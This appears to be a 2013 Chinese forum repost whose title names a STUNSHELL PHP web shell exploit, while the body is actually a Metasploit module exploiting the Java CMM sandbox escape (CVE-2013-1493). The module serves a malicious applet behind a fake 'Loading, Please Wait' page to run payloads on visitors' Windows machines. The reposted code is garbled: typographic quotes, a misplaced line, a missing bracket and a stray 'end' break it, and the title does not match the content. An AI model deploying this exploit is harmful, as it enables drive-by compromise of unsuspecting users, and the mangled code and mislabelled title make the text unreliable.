标题:
STUNSHELL PHP Web Shell远程执行代码
作者:
admin
时间:
2013-4-4 17:31
标题:
STUNSHELL PHP Web Shell远程执行代码
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#
http://metasploit.com/
##
require ‘msf/core’
require ‘rex’
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({ :javascript => false })
def initialize( info = {} )
super( update_info( info,
‘Name’ => ‘Java CMM Remote Code Execution’,
‘Description’ => %q{
This module abuses the Color Management classes from a Java Applet to run
arbitrary Java code outside of the sandbox as exploited in the wild in February
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
systems. This exploit doesn’t bypass click-to-play, so the user must accept the java
warning in order to run the malicious applet.
},
‘License’ => MSF_LICENSE,
‘Author’ =>
'Unknown', # Vulnerability discovery and Exploit
'juan vazquez' # Metasploit module (just ported the published exploit)
],
‘References’ =>
[
[ 'CVE', '2013-1493' ],
[ 'OSVDB', '90737' ],
[ 'BID', '58238' ],
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
[ 'URL', 'http://pastie.org/pastes/6581034' ]
],
‘Platform’ => [ 'win', 'java' ],
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
‘Targets’ =>
[
[ 'Generic (Java Payload)',
{
'Platform' => 'java',
'Arch' => ARCH_JAVA
}
],
[ 'Windows x86 (Native Payload)',
{
'Platform' => 'win',
'Arch' => ARCH_X86
}
]
],
‘‘DisclosureDate’ => ‘Mar 01 2013′
))
end
def setup
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
@init_class_name = rand_text_alpha(“Init”.length)
@init_class.gsub!(“Init”, @init_class_name)
super
end
def on_request_uri(cli, request)
print_status(“handling request for #{request.uri}”)
case request.uri
when /\.jar$/i
jar = payload.encoded_jar
jar.add_file(“#{@init_class_name}.class”, @init_class)
jar.add_file(“Leak.class”, @leak_class)
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)
jar.add_file(“MyColorSpace.class”, @color_space_class)
DefaultTarget’ => 1,
metasploit_str = rand_text_alpha(“metasploit”.length)
payload_str = rand_text_alpha(“payload”.length)
jar.entries.each { |entry|
entry.name.gsub!(“metasploit”, metasploit_str)
entry.name.gsub!(“Payload”, payload_str)
entry.data = entry.data.gsub(“metasploit”, metasploit_str)
entry.data = entry.data.gsub(“Payload”, payload_str)
}
jar.build_manifest
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
when /\/$/
payload = regenerate_payload(cli)
if not payload
print_error(“Failed to generate the payload.”)
send_not_found(cli)
return
end
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
else
send_redirect(cli, get_resource() + ‘/’, ”)
end
end
def generate_html
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
html += %Q|</applet></body></html>|
return html
end
end
end